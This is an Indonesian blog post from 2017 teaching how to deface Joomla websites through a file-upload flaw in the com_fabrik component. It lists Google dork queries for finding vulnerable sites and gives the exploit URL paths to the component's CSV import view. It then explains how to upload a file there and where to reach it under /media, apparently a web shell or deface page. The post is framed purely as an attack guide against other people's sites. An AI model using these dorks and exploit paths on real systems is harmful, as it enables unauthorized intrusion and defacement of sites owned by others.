Selasa, 22 Agustus 2017

Cara deface teknik Com_Fabrik


Deface teknik Com_Fabrik ini adalah memanfaatkan bug pada celah website berbasis cms jomlaa yang memiliki vulnerabilitas pada componen fabrik di cms jomla. Oke gan simak tutorialnya.

Pertama siapkan bahan :

Dork :

inurl:index.php?option=com_fabrik

inurl:index.php/component/fabrik/ site:

inurl:index.php?option=com_fabrik&view= site:

inurl:importcsv.php site:

inurl:viewTable?cid= site:com

Exploit :

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher 


1. Dorking

Step pertama kita adalah dorking. Dorkingnya harus sabar ya karena agak susah nemu websitenya yang vuln


2. Exploit site !

Kalau sudah dorking, dan memilih websitenya sekarang agan exploit, jika vuln terdapat kolom untuk uploadnya.
 


 
3. Upload

Untuk menguploadnya agan cuma perlu klik browse... kalau sudah pilih filenya klik Import CSV kalau sudah diupload kita cek file kita tadi, tempatnya ada di site.com/media/file.php






 


EmoticonEmoticon